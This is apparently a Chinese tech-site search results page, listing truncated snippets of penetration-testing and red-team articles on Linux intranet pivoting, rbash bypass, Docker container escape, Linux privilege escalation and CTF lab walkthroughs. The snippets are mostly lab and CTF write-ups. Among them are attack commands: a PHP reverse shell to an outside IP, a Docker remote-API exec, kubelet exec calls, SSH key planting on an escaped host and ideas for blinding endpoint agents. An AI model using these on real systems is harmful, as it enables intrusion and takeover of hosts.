首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

红蓝对抗之Linux内网渗透

3.2 nc/ncat 服务端执行监听命令: ncat --sh-exec "ncat 127.0.0.1 22" -l 80 --keep-open 客户端连接服务端的80端口即可SSH连接: SSH...比如网站是php的,那我们可以在配置文件文件中,插入恶意代码,获取Cookie等信息,下面是代码示例 <?...//host:2375 ps 然后进入容器: docker -H tcp://host:2375 exec -it CONTAINERID sh 默认执行命令只能看到容器内的: 进入到挂载进来的磁盘中...curl -k https://host:10250/pods 根据上述获取到的信息在容器中执行命令: curl -Gks https://host:10250/exec/{namespace}/{...这里有几个思路和大家一起讨论: 滞空LD_PRELOAD来绕过用户态的hook,busybox同理 利用代码来执行命令 利用ptrace进行日志混淆 关闭或致盲agent通信 7.2 NIDS NIDS

1.8K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    「翻译」 如何Bypass rbash

    2、PHP 同样的,你可以在需要执行的主机上使用php反向shellcode,在你监听的IP上就会获得反向连接的shell。...1、more 通过执行以下命令获取/bin/more程序的特权来绕过受限制的环境 !'sh' 现在如果你试图访问/etc 目录,再次尝试那么你会看到你能够执行cd pwd命令,如下所示 ?...2、less 通过执行以下命令获取/bin/less程序的特权来绕过受限制的环境 less ignite.txt ? !'sh' ?...在rbash shell下执行以下命令,可以获取bin/usr/expect的特权来绕过受限的环境。...六、通过ssh绕过rbash 如果你知道属于在rbash shell部分中ssh的用户认证凭据,那么你可以使用以下命令通过ssh来破解jail 然后绕过rbash获得合适的权限 ssh ignite@

    1.2K10

    技术干货 | Docker 容器逃逸案例汇集

    ---- 2.3 docker 高危启动参数 docker中存在一些比较高危的启动命令,给予容器较大的权限,允许执行一些特权操作,在一定的条件下,可以导致容器逃逸。...(—privileged) 使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令.../main 248f8b7d3c45:/tmp 3、模仿攻击者,在容器中执行payload # 进入容器sudo docker exec -it 248f8b7d3c45 /bin/bash # 修改权限...4、假设,管理员通过exec进入容器,从而触发Payload。...黑客可以通过在容器中替换libnss*.so等库,将代码注入到docker-tar中。当Docker用户尝试从容器中拷贝文件时将会执行恶意代码,成功实现Docker逃逸,获得宿主机root权限。

    2.9K10

    一文吃透Linux提权

    如果nmap设置了SUID位,它将以root特权运行,我们可以通过其交互模式访问’root’shell。 nmap –interactive –运行nmap交互模式!...Cron Jobs被用于通过在服务器上的特定日期和时间执行命令来安排任务。它们最常用于sysadmin任务,如备份或清理/tmp/目录等。Cron这个词来自crontab,它存在于/etc目录中。...在PATH中, 小白告诉小明’ls’命令在他的目录中不起作用 小白在他的目录中添加代码,这将更改sudoers文件并使他成为管理员 小白将该代码存储在名为“ ls”并使其可执行 小明具有root特权。...她来了,并在小白的主目录中执行了’ls’命令 恶意代码不是通过原始的’ls’命令而是通过root访问来执行 在另存为“ ls”的文件中,添加了一个代码,该代码将打印“ Hello world” ?...在PATH变量中 ? ? $ ls –执行的./ls文件,而不是运行列表命令。 现在,如果root用户以root特权执行代码,我们可以使用root特权实现任意代码执行。 ?

    5.6K42

    攻防靶场(36):赢麻了,4种方式进后台、5种方式提权 FUNBOX3 EASY

    由于Kali和靶机在同一个C段,可以扫描ARP协议获取靶机IP地址。...Linux 镜像,上传到靶机中,并导入到LXC中 使用 Alpine Linux 镜像,以特权模式启动容器实例 为容器实例挂载宿主机磁盘 启动容器实例,并在容器中执行返回shell的命令,从而获得容器权限...在容器中可以访问宿主机中的所有敏感权限,类似于获得root用户的read权限 5.2 (三)滥用特权控制机制:Sudo和Sudo缓存 tony用户能以root用户权限执行pkexec命令 pkexec...命令可用于提权 最终获得root用户权限 5.3 (四)滥用特权控制机制:Sudo和Sudo缓存 tony用户能以root用户权限执行mtr命令 mtr命令能以root用户权限阅读服务器中的所有敏感文件...最终类似于获得root用户的read权限 5.4 (五)滥用特权控制机制:Sudo和Sudo缓存 tony用户能以root用户权限执行time命令 pkexec命令可用于提权 最终获得root用户权限

    7200

    云原生安全 | docker容器逃逸

    攻击者可以通过特定的容器镜像或者exec操作获取到宿主机runc执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。...接着在容器执行payload,同时开启监听,等待受害者去启动docker容器,当受害者执行docker exec -it 命令时,获得反弹shell,完成逃逸。 ?...进入/hack/.ssh目录中,写入我们的生成的公钥: vi /hack/.ssh/authorized_keys ? 再利用我们的私钥就可以登录到宿主机中,完成逃逸: ? ?...2、特权模式(privileged) 使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,并通过写入计划任务等方式进行逃逸...以特权模式启动docker容器web1 docker run -itd --privileged web1 /bin/bash 进入容器,查看磁盘文件: docker exec -it 0e6fdba0a24c

    2.3K20

    记一次内网渗透(二)

    在sql执行处执行select 'php phpinfo();?>',并F12查看当前页面cookie中的phpmyadmin的值。 ?...docker exec进入。...使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。...当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。...我们看到靶场描述中有一个“ssh密钥利用”,猜测是利用docker的特权模式来在宿主机硬盘中写入ssh私钥,实现ssh免密登录宿主机,从而实现对目标宿主机的控制。

    1.7K30

    【Cisco Packet Tracer| 一.交换机配置模式与基本参数配置】

    一.交换机的多种模式以及切换 1.如何进入到交换机配置的命令行用户界面(Command Line Interface) enter进入到普通用户模式 2.普通模式模式 普通用户模式下的 命令提示符:>...: shift+insert:复制命令行上的内容 shift+delete:粘贴最近一次剪切板中的内容到命令行上 普通用户模式转为特权用户模式: Switch>enable Switch# 3....特权用户模式 特权用户模式下的命令提示符:# Switch#?...全局模式下-交换机改名 全局模式下: Switch(config)#hostname song song(config)# 2.接口模式下-配置端口速度和工作模式 2.1配置端口速度 song(...interface FastEthernet0/4 --More-- 4.命令的撤销 有些命令可以通过覆盖来达到撤销后再次写入的目的,但是有些命令只能通过撤销后再次写入来完成 song(config-if

    2.2K20

    思科路由器口令:启用和加密

    Cisco路由器上可以配置多种类型的口令,例如使能口令、Telnet和SSH连接的加密口令以及控制台端口,所有这些密码位置都代表密码的良好访问位置,但如果您只在一个访问位置上有一个密码,则至少应该有一个启用密码...设置使能密码 每次从用户EXEC模式切换到特权EXEC模式时都需要使用使能口令。 此口令为您的路由器提供安全保护,因为特权执行模式是所有危险命令所在的位置,包括访问全局配置模式。...要设置启用密码,请使用以下命令: [202110271926201.png] 此命令创建存储在配置文件中的启用密码。...同时配置使能口令和加密口令时,加密口令是用于从用户执行模式切换到特权执行模式的口令。...以下代码为您的路由器设置两个密码: [202110271930576.png] 要查看配置中的启用密码,请使用以下命令: [202110271930940.png] 配置文件中的大多数加密密码使用弱可逆加密

    1.1K41

    ATT&CK实战系列-红队评估(七)学习记录

    使用goby命令执行进行反弹shell+提权 获取到的是jobs的权限 (后面发现是web2的docker容器) Kali:nc -lvp 8065 Goby:bash -c 'exec bash -...Docker逃逸 利用Docker特权模式逃逸 1.特权模式于版本0.6时被引入Docker,允许容器内的root拥有外部物理机root权限,而此前容器内root用户仅拥有外部物理机普通用户权限。...2.使用特权模式启动容器,可以获取大量设备文件访问权限。...3.当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。...以下两种: 1.在/hack/home/ubuntu/.ssh目录下写入公钥文件(redis提权的web1生成公钥) we1命令: ssh-keygen -f hello #写公钥和私钥 chmod 600

    1.3K10

    记一次docker逃逸学习

    中返回true 5、经过urldecode函数解码后的_page存在在whitelist中返回true 我们可以看到在index.php调用checkPageValidity函数时没有传入其他参数,因此会进入第一个判断.../被包含文件'来满足条件,但是target进入到index.php的include()中,被包含的文件无法打开,出现报错。...当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。...那么这里就可以尝试使用特权模式写入ssh私钥,使用ssh免密登录 这里首先新建一个tmptest文件夹,用来存放挂载后的docker 查看一下dev文件夹里面的设备文件 可以看到有四个sda设备文件...,我们知道ubuntu有两个网段,跟129这台主机是在一个域内的,那么可以看一下是否有连接过129这台主机的命令曾经执行过,这里就类似于windows里面的udp凭证被保存了下来 域控横向移动 这里拿到了域成员的帐号和密码

    90120

    实战|记一次逃逸Docker渗透测试

    这里对应版本的漏洞是CVE-2018-12613,是一个文件包含的漏洞,这里看一下漏洞的分析 首先在如下图所示的index.php中存在一处包含指定文件的代码: ?...这里我尝试脏牛失败,这里就需要使用到privileged特权模式逃逸 privileged特权模式逃逸 docker中提供了一个--privileged参数,这个参数本身最初的目的是为了提供在docker...当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。...那么这里就可以尝试使用特权模式写入ssh私钥,使用ssh免密登录 这里首先新建一个tmptest文件夹,用来存放挂载后的docker ? 查看一下dev文件夹里面的设备文件 ?...这里还有一个获取密码的方式就是获取ubuntu执行命令的历史记录,我们知道ubuntu有两个网段,跟129这台主机是在一个域内的,那么可以看一下是否有连接过129这台主机的命令曾经执行过,这里就类似于windows

    2.3K20

    实战记录 | 自主搭建的三层网络域渗透靶场

    利用该漏洞需要满足以下两个条件之一: •由一个攻击者控制的恶意镜像创建•攻击者具有某已存在容器的写权限,且可通过docker exec进入。...Docker 特权模式逃逸 特权模式于版本0.6时被引入Docker,允许容器内的root拥有外部物理机root权限,而此前容器内root用户仅拥有外部物理机普通用户权限。...使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。...当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。...我们可以通过写入计划任务的方式在宿主机执行metasploit生成的命令。

    5K40

    Vulhub系列:Os-hackNos

    发现开了22,80 http端口 ssh-hostkey OpenSSH 通过在 know-hosts 中存储主机名和 hostkey 对服务端身份进行认证 以上扫描结果中的hostkey即ssh服务端的主机密钥...基于口令的认证 Password 方式既客户端提供用户和密码,服务端对用户和密码进行匹配,完成认证。 可以通过暴力破解攻击此类认证方式中的弱密码。 medusa -M ssh -H ....root,执行权限为x,即当我们以普通用户执行passwd命令时,和root用户执行passwd的效果一致。...,提权的思路如下 Nmap (低版本2.02-5.21可直接使用 --interactive进入交互模式 使用!...Linux密码文件 Linux系统中,所有用户(包括系统管理员)的账号和密码都可以在/etc/passwd和/etc/shadow这两个文件中找到 。 ?

    1.5K10

    内网靶场实战——ATT&CK实战系列(四)

    ,等待目标上线 而后在冰蝎进行对应即可 此时成功上线msf,接下来sessions 1 即可进入会话 方法二 除了利用冰蝎进行反弹shell,我们也可以通过生成msf木马,然后上传到服务器去执行来获取...exec操作获取到宿主机runc执行时的文件句柄并修改掉runc的二进制文件,从而获取到宿主机的root执行权限。...特权模式逃逸 利用docker的特权模式来在宿主机硬盘中写入ssh私钥,实现ssh免密登录宿主机,从而实现对目标宿主机的控制。...使用特权模式启动容器,可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。...当控制使用特权模式启动的容器时,docker管理员可通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。

    82950

    hackthebox 我的第一次

    发这个生成的shell,不好用就直接找出我小本本里的php反弹shell命令 php -r '$sock=fsockopen("10.10.14.8",4445);exec("/bin/bash -i...看到有这个 ssh 的私钥 ssh 公私密钥:可以生成免密登录,分为公钥和私钥,私钥才是登录密码 ssh -i doc paul@10.10.10.26 PS:私钥文件必须只能是600,访问权限太高太低都不行...发现USBCreator D-bus有一个接口漏洞,使得攻击者能够访问sudoer组中的用户,从而绕过sudo程序强加的密码安全策略。...这会导致特权提升,例如,通过覆盖影子文件和为root设置密码。...总结:web方面进入,细心观察,耐心点,了解了ssh的私钥密钥问题,在拿到地权限,主要收集web站点的信息找突破。信息收集在渗透中尤为重要。

    81770

    WordPress清理.ico木马详细教程

    通过Google搜索网站访问的时候,会跳转到其他网站;直接通过网址访问网站的时候,不会跳转,隐蔽性极强 网站根目录的index.php和wp-config.php文件被插入 @include 代码加载恶意文件...由于木马文件很多,靠人工是很难找到所有恶意文件的,所以要求通过ssh登录服务器去执行操作命令批量查找,也就是说,如果你的是一般的虚拟主机,通常没有ssh操作权限,无法按照本文命令执行。...-name '*.ico'进入到网站所在的根目录,执行上面的命令,就看已查找到所有 ico 格式的文件,这些文件的名称一般是随机的,或者带有点号.开头的,删除它们!...第3步:查找通过 @includes 引入恶意文件的代码 攻击者一般会在网站根目录的index.php和wp-config.php文件被插入 @include 代码加载恶意文件,所以我们要先删除这两个文件开头的...通过下面的命令,我们可以找到这些目录中包含的所有php文件。 #检查静态文件所在目录是否有php文件,查看文件大小判断是否可疑 find .

    1.1K10

    如何使用PHP SSH2模块执行远程Linux命令

    PHP SSH2扩展是用于在PHP程序中使用SSH(安全壳协议)的一种扩展。它允许建立加密连接和执行远程命令、上传和下载文件等操作,十分方便实用。...它提供了一组API函数,使开发者可以在自己的应用中实现SSH客户端的功能,如远程执行命令、文件传输和端口转发等。...我们通过stream_set_blocking()将流设置为阻塞模式,并使用stream_get_contents()获取流中的所有内容。输出打印为远程命令的执行结果。...在连接、执行、上传和下载操作失败时,该扩展将会返回错误代码和错误信息,以帮助您了解失败的原因。...总结 PHP SSH2扩展为用户提供了一种简便的方法,在PHP程序中使用SSH进行连接、执行命令、上传和下载文件等操作。它在服务器管理和部署的过程中是非常有用的。

    59310

    靶场实战(20):OSCP备考之内网靶场红日7

    首先使用命令ssh-keygen -t rsa生成 SSH 服务的公钥和私钥文件,并在会话框中输入./id_rsa指定存储路径。 然后使用命令(echo -e "\n\n"; cat ....如果我们能在该程序中、或该程序引用的其它程序中,写入返回 shell 的代码,那么我们在执行该程序时,就能以该程序属主 root 用户的权限返回一个 shell,从而提权到 root 权限。...使用命令/home/jobs/shell执行该程序,确实是执行了 ps 命令,看来这个敏感文件应该大概可能就是该程序的源代码了。 分析源代码得知,该程序在执行 ps 命令时,没有使用绝对路径。...特权模式启动的容器,可以挂载宿主机的磁盘,并对磁盘具有 root 用户的读写权限。那我们不就能通过写入 SSH 公钥、写入反弹 shell 的计划任务,获得 root 用户的权限了?...容器特权模式逃逸漏洞,能在宿主机中写入 SSH 公钥、或写入反弹 shell 的计划任务,获得宿主机的 root 用户权限。

    22510
    领券